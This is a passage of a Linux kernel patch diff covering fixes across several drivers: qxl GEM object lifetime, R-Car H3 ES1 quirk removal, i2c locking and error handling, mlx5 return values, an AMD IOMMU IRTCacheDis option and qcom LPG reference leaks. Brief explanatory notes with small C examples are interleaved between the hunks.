+ 	struct qxl_surface surf;
+@@ -62,11 +63,13 @@ int qxl_mode_dumb_create(struct drm_file *file_priv,
+ 
+ 	r = qxl_gem_object_create_with_handle(qdev, file_priv,
+ 					      QXL_GEM_DOMAIN_CPU,
+-					      args->size, &surf, &qobj,
++					      args->size, &surf, &gobj,
+ 					      &handle);
+ 	if (r)
+ 		return r;
++	qobj = gem_to_qxl_bo(gobj);
+ 	qobj->is_dumb = true;
++	drm_gem_object_put(gobj);
+ 	args->pitch = pitch;
+ 	args->handle = handle;
+ 	return 0;
+diff --git a/drivers/gpu/drm/qxl/qxl_gem.c b/drivers/gpu/drm/qxl/qxl_gem.c
+index a08da0bd9098b..fc5e3763c3595 100644
+--- a/drivers/gpu/drm/qxl/qxl_gem.c
++++ b/drivers/gpu/drm/qxl/qxl_gem.c
+@@ -72,32 +72,41 @@ int qxl_gem_object_create(struct qxl_device *qdev, int size,
+ 	return 0;
+ }
+ 
++/*
++ * If the caller passed a valid gobj pointer, it is responsible for calling
++ * drm_gem_object_put() when it no longer needs to access the object.
++ *
++ * If gobj is NULL, it is handled internally.
++ */
+ int qxl_gem_object_create_with_handle(struct qxl_device *qdev,
+ 				      struct drm_file *file_priv,
+ 				      u32 domain,
+ 				      size_t size,
+ 				      struct qxl_surface *surf,
+-				      struct qxl_bo **qobj,
++				      struct drm_gem_object **gobj,
+ 				      uint32_t *handle)
+ {
+-	struct drm_gem_object *gobj;
+ 	int r;
++	struct drm_gem_object *local_gobj;
+ 
+-	BUG_ON(!qobj);
+ 	BUG_ON(!handle);
+ 
+ 	r = qxl_gem_object_create(qdev, size, 0,
+ 				  domain,
+ 				  false, false, surf,
+-				  &gobj);
++				  &local_gobj);
+ 	if (r)
+ 		return -ENOMEM;
+-	r = drm_gem_handle_create(file_priv, gobj, handle);
++	r = drm_gem_handle_create(file_priv, local_gobj, handle);
+ 	if (r)
+ 		return r;
+-	/* drop reference from allocate - handle holds it now */
+-	*qobj = gem_to_qxl_bo(gobj);
+-	drm_gem_object_put(gobj);
++
++	if (gobj)
++		*gobj = local_gobj;
++	else
++		/* drop reference from allocate - handle holds it now */
++		drm_gem_object_put(local_gobj);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/gpu/drm/qxl/qxl_ioctl.c b/drivers/gpu/drm/qxl/qxl_ioctl.c
+index 30f58b21372aa..dd0f834d881ce 100644
+--- a/drivers/gpu/drm/qxl/qxl_ioctl.c
++++ b/drivers/gpu/drm/qxl/qxl_ioctl.c
+@@ -38,7 +38,6 @@ int qxl_alloc_ioctl(struct drm_device *dev, void *data, struct drm_file *file_pr
+ 	struct qxl_device *qdev = to_qxl(dev);
+ 	struct drm_qxl_alloc *qxl_alloc = data;
+ 	int ret;
+-	struct qxl_bo *qobj;
+ 	uint32_t handle;
+ 	u32 domain = QXL_GEM_DOMAIN_VRAM;
+ 
+@@ -50,7 +49,7 @@ int qxl_alloc_ioctl(struct drm_device *dev, void *data, struct drm_file *file_pr
+ 						domain,
+ 						qxl_alloc->size,
+ 						NULL,
+-						&qobj, &handle);
++						NULL, &handle);
+ 	if (ret) {
+ 		DRM_ERROR("%s: failed to create gem ret=%d\n",
+ 			  __func__, ret);
+@@ -386,7 +385,6 @@ int qxl_alloc_surf_ioctl(struct drm_device *dev, void *data, struct drm_file *fi
+ {
+ 	struct qxl_device *qdev = to_qxl(dev);
+ 	struct drm_qxl_alloc_surf *param = data;
+-	struct qxl_bo *qobj;
+ 	int handle;
+ 	int ret;
+ 	int size, actual_stride;
+@@ -406,7 +404,7 @@ int qxl_alloc_surf_ioctl(struct drm_device *dev, void *data, struct drm_file *fi
+ 						QXL_GEM_DOMAIN_SURFACE,
+ 						size,
+ 						&surf,
+-						&qobj, &handle);
++						NULL, &handle);
+ 	if (ret) {
+ 		DRM_ERROR("%s: failed to create gem ret=%d\n",
+ 			  __func__, ret);
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_crtc.c b/drivers/gpu/drm/rcar-du/rcar_du_crtc.c
+index b7dd59fe119e6..9edb5edb2bad9 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_crtc.c
++++ b/drivers/gpu/drm/rcar-du/rcar_du_crtc.c
+@@ -223,20 +223,6 @@ static void rcar_du_crtc_set_display_timing(struct rcar_du_crtc *rcrtc)
+ 		 * DU channels that have a display PLL can't use the internal
+ 		 * system clock, and have no internal clock divider.
+ 		 */
+-
+-		/*
+-		 * The H3 ES1.x exhibits dot clock duty cycle stability issues.
+-		 * We can work around them by configuring the DPLL to twice the
+-		 * desired frequency, coupled with a /2 post-divider. Restrict
+-		 * the workaround to H3 ES1.x as ES2.0 and all other SoCs have
+-		 * no post-divider when a display PLL is present (as shown by
+-		 * the workaround breaking HDMI output on M3-W during testing).
+-		 */
+-		if (rcdu->info->quirks & RCAR_DU_QUIRK_H3_ES1_PCLK_STABILITY) {
+-			target *= 2;
+-			div = 1;
+-		}
+-
+ 		extclk = clk_get_rate(rcrtc->extclock);
+ 		rcar_du_dpll_divider(rcrtc, &dpll, extclk, target);
+ 
+@@ -245,30 +231,13 @@ static void rcar_du_crtc_set_display_timing(struct rcar_du_crtc *rcrtc)
+ 		       | DPLLCR_N(dpll.n) | DPLLCR_M(dpll.m)
+ 		       | DPLLCR_STBY;
+ 
+-		if (rcrtc->index == 1) {
++		if (rcrtc->index == 1)
+ 			dpllcr |= DPLLCR_PLCS1
+ 			       |  DPLLCR_INCS_DOTCLKIN1;
+-		} else {
+-			dpllcr |= DPLLCR_PLCS0_PLL
++		else
++			dpllcr |= DPLLCR_PLCS0
+ 			       |  DPLLCR_INCS_DOTCLKIN0;
+ 
+-			/*
+-			 * On ES2.x we have a single mux controlled via bit 21,
+-			 * which selects between DCLKIN source (bit 21 = 0) and
+-			 * a PLL source (bit 21 = 1), where the PLL is always
+-			 * PLL1.
+-			 *
+-			 * On ES1.x we have an additional mux, controlled
+-			 * via bit 20, for choosing between PLL0 (bit 20 = 0)
+-			 * and PLL1 (bit 20 = 1). We always want to use PLL1,
+-			 * so on ES1.x, in addition to setting bit 21, we need
+-			 * to set the bit 20.
+-			 */
+-
+-			if (rcdu->info->quirks & RCAR_DU_QUIRK_H3_ES1_PLL)
+-				dpllcr |= DPLLCR_PLCS0_H3ES1X_PLL1;
+-		}
+-
+ 		rcar_du_group_write(rcrtc->group, DPLLCR, dpllcr);
+ 
+ 		escr = ESCR_DCLKSEL_DCLKIN | div;
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_drv.c b/drivers/gpu/drm/rcar-du/rcar_du_drv.c
+index 6381578c4db58..bd7003d6e0753 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_drv.c
++++ b/drivers/gpu/drm/rcar-du/rcar_du_drv.c
+@@ -16,7 +16,6 @@
+ #include <linux/platform_device.h>
+ #include <linux/pm.h>
+ #include <linux/slab.h>
+-#include <linux/sys_soc.h>
+ #include <linux/wait.h>
+ 
+ #include <drm/drm_atomic_helper.h>
+@@ -387,43 +386,6 @@ static const struct rcar_du_device_info rcar_du_r8a7795_info = {
+ 	.dpll_mask =  BIT(2) | BIT(1),
+ };
+ 
+-static const struct rcar_du_device_info rcar_du_r8a7795_es1_info = {
+-	.gen = 3,
+-	.features = RCAR_DU_FEATURE_CRTC_IRQ
+-		  | RCAR_DU_FEATURE_CRTC_CLOCK
+-		  | RCAR_DU_FEATURE_VSP1_SOURCE
+-		  | RCAR_DU_FEATURE_INTERLACED
+-		  | RCAR_DU_FEATURE_TVM_SYNC,
+-	.quirks = RCAR_DU_QUIRK_H3_ES1_PCLK_STABILITY
+-		| RCAR_DU_QUIRK_H3_ES1_PLL,
+-	.channels_mask = BIT(3) | BIT(2) | BIT(1) | BIT(0),
+-	.routes = {
+-		/*
+-		 * R8A7795 has one RGB output, two HDMI outputs and one
+-		 * LVDS output.
+-		 */
+-		[RCAR_DU_OUTPUT_DPAD0] = {
+-			.possible_crtcs = BIT(3),
+-			.port = 0,
+-		},
+-		[RCAR_DU_OUTPUT_HDMI0] = {
+-			.possible_crtcs = BIT(1),
+-			.port = 1,
+-		},
+-		[RCAR_DU_OUTPUT_HDMI1] = {
+-			.possible_crtcs = BIT(2),
+-			.port = 2,
+-		},
+-		[RCAR_DU_OUTPUT_LVDS0] = {
+-			.possible_crtcs = BIT(0),
+-			.port = 3,
+-		},
+-	},
+-	.num_lvds = 1,
+-	.num_rpf = 5,
+-	.dpll_mask =  BIT(2) | BIT(1),
+-};
+-
+ static const struct rcar_du_device_info rcar_du_r8a7796_info = {
+ 	.gen = 3,
+ 	.features = RCAR_DU_FEATURE_CRTC_IRQ
+@@ -592,11 +554,6 @@ static const struct of_device_id rcar_du_of_table[] = {
+ 
+ MODULE_DEVICE_TABLE(of, rcar_du_of_table);
+ 
+-static const struct soc_device_attribute rcar_du_soc_table[] = {
+-	{ .soc_id = "r8a7795", .revision = "ES1.*", .data = &rcar_du_r8a7795_es1_info },
+-	{ /* sentinel */ }
+-};
+-
+ const char *rcar_du_output_name(enum rcar_du_output output)
+ {
+ 	static const char * const names[] = {
+@@ -688,7 +645,6 @@ static void rcar_du_shutdown(struct platform_device *pdev)
+ 
+ static int rcar_du_probe(struct platform_device *pdev)
+ {
+-	const struct soc_device_attribute *soc_attr;
+ 	struct rcar_du_device *rcdu;
+ 	unsigned int mask;
+ 	int ret;
+@@ -706,10 +662,6 @@ static int rcar_du_probe(struct platform_device *pdev)
+ 
+ 	rcdu->info = of_device_get_match_data(rcdu->dev);
+ 
+-	soc_attr = soc_device_match(rcar_du_soc_table);
+-	if (soc_attr)
+-		rcdu->info = soc_attr->data;
+-
+ 	platform_set_drvdata(pdev, rcdu);
+ 
+ 	/* I/O resources */
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_drv.h b/drivers/gpu/drm/rcar-du/rcar_du_drv.h
+index acc3673fefe18..5cfa2bb7ad93d 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_drv.h
++++ b/drivers/gpu/drm/rcar-du/rcar_du_drv.h
+@@ -34,8 +34,6 @@ struct rcar_du_device;
+ #define RCAR_DU_FEATURE_NO_BLENDING	BIT(5)	/* PnMR.SPIM does not have ALP nor EOR bits */
+ 
+ #define RCAR_DU_QUIRK_ALIGN_128B	BIT(0)	/* Align pitches to 128 bytes */
+-#define RCAR_DU_QUIRK_H3_ES1_PCLK_STABILITY BIT(1)	/* H3 ES1 has pclk stability issue */
+-#define RCAR_DU_QUIRK_H3_ES1_PLL	BIT(2)	/* H3 ES1 PLL setup differs from non-ES1 */
+ 
+ enum rcar_du_output {
+ 	RCAR_DU_OUTPUT_DPAD0,
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_regs.h b/drivers/gpu/drm/rcar-du/rcar_du_regs.h
+index 789ae9285108e..288eff12b2b1a 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_regs.h
++++ b/drivers/gpu/drm/rcar-du/rcar_du_regs.h
+@@ -283,8 +283,7 @@
+ #define DPLLCR			0x20044
+ #define DPLLCR_CODE		(0x95 << 24)
+ #define DPLLCR_PLCS1		(1 << 23)
+-#define DPLLCR_PLCS0_PLL	(1 << 21)
+-#define DPLLCR_PLCS0_H3ES1X_PLL1	(1 << 20)
++#define DPLLCR_PLCS0		(1 << 21)
+ #define DPLLCR_CLKE		(1 << 18)
+ #define DPLLCR_FDPLL(n)		((n) << 12)
+ #define DPLLCR_N(n)		((n) << 5)
+diff --git a/drivers/gpu/drm/stm/ltdc.c b/drivers/gpu/drm/stm/ltdc.c
+index 03c6becda795c..b8be4c1db4235 100644
+--- a/drivers/gpu/drm/stm/ltdc.c
++++ b/drivers/gpu/drm/stm/ltdc.c
+@@ -1145,7 +1145,7 @@ static void ltdc_crtc_disable_vblank(struct drm_crtc *crtc)
+ 
+ static int ltdc_crtc_set_crc_source(struct drm_crtc *crtc, const char *source)
+ {
+-	struct ltdc_device *ldev = crtc_to_ltdc(crtc);
++	struct ltdc_device *ldev;
+ 	int ret;
+ 
+ 	DRM_DEBUG_DRIVER("\n");
+@@ -1153,6 +1153,8 @@ static int ltdc_crtc_set_crc_source(struct drm_crtc *crtc, const char *source)
+ 	if (!crtc)
+ 		return -ENODEV;
+ 
++	ldev = crtc_to_ltdc(crtc);
++
+ 	if (source && strcmp(source, "auto") == 0) {
+ 		ldev->crc_active = true;
+ 		ret = regmap_set_bits(ldev->regmap, LTDC_GCR, GCR_CRCEN);
+diff --git a/drivers/hid/hid-logitech-hidpp.c b/drivers/hid/hid-logitech-hidpp.c
+index 0b4204b9a253c..97eefb77f6014 100644
+--- a/drivers/hid/hid-logitech-hidpp.c
++++ b/drivers/hid/hid-logitech-hidpp.c
+@@ -4403,6 +4403,8 @@ static const struct hid_device_id hidpp_devices[] = {
+ 	  HID_USB_DEVICE(USB_VENDOR_ID_LOGITECH, 0xC086) },
+ 	{ /* Logitech G903 Hero Gaming Mouse over USB */
+ 	  HID_USB_DEVICE(USB_VENDOR_ID_LOGITECH, 0xC091) },
++	{ /* Logitech G915 TKL Keyboard over USB */
++	  HID_USB_DEVICE(USB_VENDOR_ID_LOGITECH, 0xC343) },
+ 	{ /* Logitech G920 Wheel over USB */
+ 	  HID_USB_DEVICE(USB_VENDOR_ID_LOGITECH, USB_DEVICE_ID_LOGITECH_G920_WHEEL),
+ 		.driver_data = HIDPP_QUIRK_CLASS_G920 | HIDPP_QUIRK_FORCE_OUTPUT_REPORTS},
+@@ -4418,6 +4420,8 @@ static const struct hid_device_id hidpp_devices[] = {
+ 	{ /* MX5500 keyboard over Bluetooth */
+ 	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb30b),
+ 	  .driver_data = HIDPP_QUIRK_HIDPP_CONSUMER_VENDOR_KEYS },
++	{ /* Logitech G915 TKL keyboard over Bluetooth */
++	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb35f) },
+ 	{ /* M-RCQ142 V470 Cordless Laser Mouse over Bluetooth */
+ 	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb008) },
+ 	{ /* MX Master mouse over Bluetooth */
+diff --git a/drivers/hid/intel-ish-hid/ipc/hw-ish.h b/drivers/hid/intel-ish-hid/ipc/hw-ish.h
+index fc108f19a64c3..e99f3a3c65e15 100644
+--- a/drivers/hid/intel-ish-hid/ipc/hw-ish.h
++++ b/drivers/hid/intel-ish-hid/ipc/hw-ish.h
+@@ -33,6 +33,7 @@
+ #define ADL_N_DEVICE_ID		0x54FC
+ #define RPL_S_DEVICE_ID		0x7A78
+ #define MTL_P_DEVICE_ID		0x7E45
++#define ARL_H_DEVICE_ID		0x7745
+ 
+ #define	REVISION_ID_CHT_A0	0x6
+ #define	REVISION_ID_CHT_Ax_SI	0x0
+diff --git a/drivers/hid/intel-ish-hid/ipc/pci-ish.c b/drivers/hid/intel-ish-hid/ipc/pci-ish.c
+index 7120b30ac51d0..55cb25038e632 100644
+--- a/drivers/hid/intel-ish-hid/ipc/pci-ish.c
++++ b/drivers/hid/intel-ish-hid/ipc/pci-ish.c
+@@ -44,6 +44,7 @@ static const struct pci_device_id ish_pci_tbl[] = {
+ 	{PCI_DEVICE(PCI_VENDOR_ID_INTEL, ADL_N_DEVICE_ID)},
+ 	{PCI_DEVICE(PCI_VENDOR_ID_INTEL, RPL_S_DEVICE_ID)},
+ 	{PCI_DEVICE(PCI_VENDOR_ID_INTEL, MTL_P_DEVICE_ID)},
++	{PCI_DEVICE(PCI_VENDOR_ID_INTEL, ARL_H_DEVICE_ID)},
+ 	{0, }
+ };
+ MODULE_DEVICE_TABLE(pci, ish_pci_tbl);
+diff --git a/drivers/i2c/busses/i2c-bcm-iproc.c b/drivers/i2c/busses/i2c-bcm-iproc.c
+index 85d8a6b048856..30a2a3200bed9 100644
+--- a/drivers/i2c/busses/i2c-bcm-iproc.c
++++ b/drivers/i2c/busses/i2c-bcm-iproc.c
+@@ -233,13 +233,14 @@ static inline u32 iproc_i2c_rd_reg(struct bcm_iproc_i2c_dev *iproc_i2c,
+ 				   u32 offset)
+ {
+ 	u32 val;
++	unsigned long flags;
+ 
+ 	if (iproc_i2c->idm_base) {
+-		spin_lock(&iproc_i2c->idm_lock);
++		spin_lock_irqsave(&iproc_i2c->idm_lock, flags);
+ 		writel(iproc_i2c->ape_addr_mask,
+ 		       iproc_i2c->idm_base + IDM_CTRL_DIRECT_OFFSET);
+ 		val = readl(iproc_i2c->base + offset);
+-		spin_unlock(&iproc_i2c->idm_lock);
++		spin_unlock_irqrestore(&iproc_i2c->idm_lock, flags);
+ 	} else {
+ 		val = readl(iproc_i2c->base + offset);
+ 	}
+@@ -250,12 +251,14 @@ static inline u32 iproc_i2c_rd_reg(struct bcm_iproc_i2c_dev *iproc_i2c,
+ static inline void iproc_i2c_wr_reg(struct bcm_iproc_i2c_dev *iproc_i2c,
+ 				    u32 offset, u32 val)
+ {
++	unsigned long flags;
++
+ 	if (iproc_i2c->idm_base) {
+-		spin_lock(&iproc_i2c->idm_lock);
++		spin_lock_irqsave(&iproc_i2c->idm_lock, flags);
+ 		writel(iproc_i2c->ape_addr_mask,
+ 		       iproc_i2c->idm_base + IDM_CTRL_DIRECT_OFFSET);
+ 		writel(val, iproc_i2c->base + offset);
+-		spin_unlock(&iproc_i2c->idm_lock);
++		spin_unlock_irqrestore(&iproc_i2c->idm_lock, flags);
+ 	} else {
+ 		writel(val, iproc_i2c->base + offset);
+ 	}
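
The iProc accessors switch from spin_lock() to spin_lock_irqsave() because they can be reached both from contexts with interrupts enabled and from ones where they are already off; plain spin_lock() would either let an interrupt handler contending for the same lock deadlock the CPU, or mis-handle a caller that already holds interrupts disabled. A generic sketch of the pattern with a hypothetical lock and shared variable:

#include <linux/spinlock.h>

static DEFINE_SPINLOCK(demo_lock);
static unsigned int demo_shared;	/* stand-in for shared hardware state */

/* Safe from any context: the caller's interrupt state is saved on
 * entry and restored on exit, whatever it was. */
static unsigned int demo_read(void)
{
	unsigned long flags;
	unsigned int val;

	spin_lock_irqsave(&demo_lock, flags);
	val = demo_shared;
	spin_unlock_irqrestore(&demo_lock, flags);

	return val;
}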
+diff --git a/drivers/i2c/busses/i2c-designware-master.c b/drivers/i2c/busses/i2c-designware-master.c
+index dc3c5a15a95b9..004ccb2d9f369 100644
+--- a/drivers/i2c/busses/i2c-designware-master.c
++++ b/drivers/i2c/busses/i2c-designware-master.c
+@@ -525,9 +525,21 @@ i2c_dw_read(struct dw_i2c_dev *dev)
+ 			u32 flags = msgs[dev->msg_read_idx].flags;
+ 
+ 			regmap_read(dev->map, DW_IC_DATA_CMD, &tmp);
++			tmp &= DW_IC_DATA_CMD_DAT;
+ 			/* Ensure length byte is a valid value */
+-			if (flags & I2C_M_RECV_LEN &&
+-			    (tmp & DW_IC_DATA_CMD_DAT) <= I2C_SMBUS_BLOCK_MAX && tmp > 0) {
++			if (flags & I2C_M_RECV_LEN) {
++				/*
++				 * if IC_EMPTYFIFO_HOLD_MASTER_EN is set, which cannot be
++				 * detected from the registers, the controller can be
++				 * disabled if the STOP bit is set. But it is only set
++				 * after receiving block data response length in
++				 * I2C_FUNC_SMBUS_BLOCK_DATA case. That needs to read
++				 * another byte with STOP bit set when the block data
++				 * response length is invalid to complete the transaction.
++				 */
++				if (!tmp || tmp > I2C_SMBUS_BLOCK_MAX)
++					tmp = 1;
++
+ 				len = i2c_dw_recv_len(dev, tmp);
+ 			}
+ 			*buf++ = tmp;
+diff --git a/drivers/i2c/busses/i2c-hisi.c b/drivers/i2c/busses/i2c-hisi.c
+index 8a61bee745a16..14ec9ee8f6f35 100644
+--- a/drivers/i2c/busses/i2c-hisi.c
++++ b/drivers/i2c/busses/i2c-hisi.c
+@@ -328,6 +328,14 @@ static irqreturn_t hisi_i2c_irq(int irq, void *context)
+ 	struct hisi_i2c_controller *ctlr = context;
+ 	u32 int_stat;
+ 
++	/*
++	 * Don't handle the interrupt if ctlr->completion is NULL. We may
++	 * reach here because the interrupt is spurious or the transfer was
++	 * started by another port (e.g. firmware) rather than by us.
++	 */
++	if (!ctlr->completion)
++		return IRQ_NONE;
++
+ 	int_stat = readl(ctlr->iobase + HISI_I2C_INT_MSTAT);
+ 	hisi_i2c_clear_int(ctlr, int_stat);
+ 	if (!(int_stat & HISI_I2C_INT_ALL))
+diff --git a/drivers/i2c/busses/i2c-tegra.c b/drivers/i2c/busses/i2c-tegra.c
+index 2bc40f957e509..aa469b33ee2ee 100644
+--- a/drivers/i2c/busses/i2c-tegra.c
++++ b/drivers/i2c/busses/i2c-tegra.c
+@@ -449,7 +449,7 @@ static int tegra_i2c_init_dma(struct tegra_i2c_dev *i2c_dev)
+ 	if (i2c_dev->is_vi)
+ 		return 0;
+ 
+-	if (!i2c_dev->hw->has_apb_dma) {
++	if (i2c_dev->hw->has_apb_dma) {
+ 		if (!IS_ENABLED(CONFIG_TEGRA20_APB_DMA)) {
+ 			dev_dbg(i2c_dev->dev, "APB DMA support not enabled\n");
+ 			return 0;
+diff --git a/drivers/infiniband/hw/mlx5/qpc.c b/drivers/infiniband/hw/mlx5/qpc.c
+index 542e4c63a8de6..d4e7864c56f18 100644
+--- a/drivers/infiniband/hw/mlx5/qpc.c
++++ b/drivers/infiniband/hw/mlx5/qpc.c
+@@ -297,8 +297,7 @@ int mlx5_core_destroy_qp(struct mlx5_ib_dev *dev, struct mlx5_core_qp *qp)
+ 	MLX5_SET(destroy_qp_in, in, opcode, MLX5_CMD_OP_DESTROY_QP);
+ 	MLX5_SET(destroy_qp_in, in, qpn, qp->qpn);
+ 	MLX5_SET(destroy_qp_in, in, uid, qp->uid);
+-	mlx5_cmd_exec_in(dev->mdev, destroy_qp, in);
+-	return 0;
++	return mlx5_cmd_exec_in(dev->mdev, destroy_qp, in);
+ }
+ 
+ int mlx5_core_set_delay_drop(struct mlx5_ib_dev *dev,
+@@ -548,14 +547,14 @@ int mlx5_core_xrcd_dealloc(struct mlx5_ib_dev *dev, u32 xrcdn)
+ 	return mlx5_cmd_exec_in(dev->mdev, dealloc_xrcd, in);
+ }
+ 
+-static void destroy_rq_tracked(struct mlx5_ib_dev *dev, u32 rqn, u16 uid)
++static int destroy_rq_tracked(struct mlx5_ib_dev *dev, u32 rqn, u16 uid)
+ {
+ 	u32 in[MLX5_ST_SZ_DW(destroy_rq_in)] = {};
+ 
+ 	MLX5_SET(destroy_rq_in, in, opcode, MLX5_CMD_OP_DESTROY_RQ);
+ 	MLX5_SET(destroy_rq_in, in, rqn, rqn);
+ 	MLX5_SET(destroy_rq_in, in, uid, uid);
+-	mlx5_cmd_exec_in(dev->mdev, destroy_rq, in);
++	return mlx5_cmd_exec_in(dev->mdev, destroy_rq, in);
+ }
+ 
+ int mlx5_core_create_rq_tracked(struct mlx5_ib_dev *dev, u32 *in, int inlen,
+@@ -586,8 +585,7 @@ int mlx5_core_destroy_rq_tracked(struct mlx5_ib_dev *dev,
+ 				 struct mlx5_core_qp *rq)
+ {
+ 	destroy_resource_common(dev, rq);
+-	destroy_rq_tracked(dev, rq->qpn, rq->uid);
+-	return 0;
++	return destroy_rq_tracked(dev, rq->qpn, rq->uid);
+ }
+ 
+ static void destroy_sq_tracked(struct mlx5_ib_dev *dev, u32 sqn, u16 uid)
+diff --git a/drivers/iommu/amd/amd_iommu_types.h b/drivers/iommu/amd/amd_iommu_types.h
+index 5ecc17240eff5..f5e9377b55212 100644
+--- a/drivers/iommu/amd/amd_iommu_types.h
++++ b/drivers/iommu/amd/amd_iommu_types.h
+@@ -172,6 +172,7 @@
+ #define CONTROL_GAINT_EN	29
+ #define CONTROL_XT_EN		50
+ #define CONTROL_INTCAPXT_EN	51
++#define CONTROL_IRTCACHEDIS	59
+ #define CONTROL_SNPAVIC_EN	61
+ 
+ #define CTRL_INV_TO_MASK	(7 << CONTROL_INV_TIMEOUT)
+@@ -708,6 +709,9 @@ struct amd_iommu {
+ 	/* if one, we need to send a completion wait command */
+ 	bool need_sync;
+ 
++	/* true if IRTE caching is disabled */
++	bool irtcachedis_enabled;
++
+ 	/* Handle for IOMMU core code */
+ 	struct iommu_device iommu;
+ 
+diff --git a/drivers/iommu/amd/init.c b/drivers/iommu/amd/init.c
+index b0af8b5967e0d..f6e64c9858021 100644
+--- a/drivers/iommu/amd/init.c
++++ b/drivers/iommu/amd/init.c
+@@ -160,6 +160,7 @@ static int amd_iommu_xt_mode = IRQ_REMAP_XAPIC_MODE;
+ static bool amd_iommu_detected;
+ static bool amd_iommu_disabled __initdata;
+ static bool amd_iommu_force_enable __initdata;
++static bool amd_iommu_irtcachedis;
+ static int amd_iommu_target_ivhd_type;
+ 
+ /* Global EFR and EFR2 registers */
+@@ -477,6 +478,9 @@ static void iommu_disable(struct amd_iommu *iommu)
+ 
+ 	/* Disable IOMMU hardware itself */
+ 	iommu_feature_disable(iommu, CONTROL_IOMMU_EN);
++
++	/* Clear IRTE cache disabling bit */
++	iommu_feature_disable(iommu, CONTROL_IRTCACHEDIS);
+ }
+ 
+ /*
+@@ -2700,6 +2704,33 @@ static void iommu_enable_ga(struct amd_iommu *iommu)
+ #endif
+ }
+ 
++static void iommu_disable_irtcachedis(struct amd_iommu *iommu)
++{
++	iommu_feature_disable(iommu, CONTROL_IRTCACHEDIS);
++}
++
++static void iommu_enable_irtcachedis(struct amd_iommu *iommu)
++{
++	u64 ctrl;
++
++	if (!amd_iommu_irtcachedis)
++		return;
++
++	/*
++	 * Note:
++	 * Support for the IRTCacheDis feature is determined by
++	 * checking whether the bit is writable.
++	 */
++	iommu_feature_enable(iommu, CONTROL_IRTCACHEDIS);
++	ctrl = readq(iommu->mmio_base +  MMIO_CONTROL_OFFSET);
++	ctrl &= (1ULL << CONTROL_IRTCACHEDIS);
++	if (ctrl)
++		iommu->irtcachedis_enabled = true;
++	pr_info("iommu%d (%#06x) : IRT cache is %s\n",
++		iommu->index, iommu->devid,
++		iommu->irtcachedis_enabled ? "disabled" : "enabled");
++}
++
+ static void early_enable_iommu(struct amd_iommu *iommu)
+ {
+ 	iommu_disable(iommu);
+@@ -2710,6 +2741,7 @@ static void early_enable_iommu(struct amd_iommu *iommu)
+ 	iommu_set_exclusion_range(iommu);
+ 	iommu_enable_ga(iommu);
+ 	iommu_enable_xt(iommu);
++	iommu_enable_irtcachedis(iommu);
+ 	iommu_enable(iommu);
+ 	iommu_flush_all_caches(iommu);
+ }
+@@ -2760,10 +2792,12 @@ static void early_enable_iommus(void)
+ 		for_each_iommu(iommu) {
+ 			iommu_disable_command_buffer(iommu);
+ 			iommu_disable_event_buffer(iommu);
++			iommu_disable_irtcachedis(iommu);
+ 			iommu_enable_command_buffer(iommu);
+ 			iommu_enable_event_buffer(iommu);
+ 			iommu_enable_ga(iommu);
+ 			iommu_enable_xt(iommu);
++			iommu_enable_irtcachedis(iommu);
+ 			iommu_set_device_table(iommu);
+ 			iommu_flush_all_caches(iommu);
+ 		}
+@@ -3411,6 +3445,8 @@ static int __init parse_amd_iommu_options(char *str)
+ 			amd_iommu_pgtable = AMD_IOMMU_V1;
+ 		} else if (strncmp(str, "pgtbl_v2", 8) == 0) {
+ 			amd_iommu_pgtable = AMD_IOMMU_V2;
++		} else if (strncmp(str, "irtcachedis", 11) == 0) {
++			amd_iommu_irtcachedis = true;
+ 		} else {
+ 			pr_notice("Unknown option - '%s'\n", str);
+ 		}
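
Since there is no dedicated capability flag for IRTCacheDis, the code above detects support by setting the control bit and checking that it sticks. A condensed sketch of that write-then-read-back probe (probe_ctrl_bit is a hypothetical helper, not the driver's API):

#include <linux/io.h>
#include <linux/bits.h>

/* On hardware that does not implement the feature, the bit is not
 * writable and reads back as zero after the write. */
static bool probe_ctrl_bit(void __iomem *ctrl_reg, unsigned int bit)
{
	u64 ctrl = readq(ctrl_reg);

	writeq(ctrl | BIT_ULL(bit), ctrl_reg);

	return !!(readq(ctrl_reg) & BIT_ULL(bit));
}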
+diff --git a/drivers/leds/rgb/leds-qcom-lpg.c b/drivers/leds/rgb/leds-qcom-lpg.c
+index f1c2419334e6f..f85a5d65d1314 100644
+--- a/drivers/leds/rgb/leds-qcom-lpg.c
++++ b/drivers/leds/rgb/leds-qcom-lpg.c
+@@ -1112,8 +1112,10 @@ static int lpg_add_led(struct lpg *lpg, struct device_node *np)
+ 		i = 0;
+ 		for_each_available_child_of_node(np, child) {
+ 			ret = lpg_parse_channel(lpg, child, &led->channels[i]);
+-			if (ret < 0)
++			if (ret < 0) {
++				of_node_put(child);
+ 				return ret;
++			}
+ 
+ 			info[i].color_index = led->channels[i]->color;
+ 			info[i].intensity = 0;
+@@ -1291,8 +1293,10 @@ static int lpg_probe(struct platform_device *pdev)
+ 
+ 	for_each_available_child_of_node(pdev->dev.of_node, np) {
+ 		ret = lpg_add_led(lpg, np);
+-		if (ret)
++		if (ret) {
++			of_node_put(np);
+ 			return ret;
++		}
+ 	}
+ 
+ 	for (i = 0; i < lpg->num_channels; i++)
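
Both hunks fix the same leak: for_each_available_child_of_node() takes a reference on each child and releases it only when the loop advances to the next one, so a break or early return leaves the current node's refcount elevated unless the exit path drops it explicitly. A minimal sketch of the corrected pattern (parse_one is an assumed per-child helper):

#include <linux/of.h>

int parse_one(struct device_node *child);	/* assumed helper */

static int parse_children(struct device_node *parent)
{
	struct device_node *child;
	int ret;

	for_each_available_child_of_node(parent, child) {
		ret = parse_one(child);
		if (ret) {
			/* The iterator still holds a reference on
			 * 'child'; drop it before leaving early. */
			of_node_put(child);
			return ret;
		}
	}

	return 0;
}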
+diff --git a/drivers/media/platform/mediatek/vpu/mtk_vpu.c b/drivers/media/platform/mediatek/vpu/mtk_vpu.c
+index 47b684b92f817..6beab9e86a22a 100644
+--- a/drivers/media/platform/mediatek/vpu/mtk_vpu.c
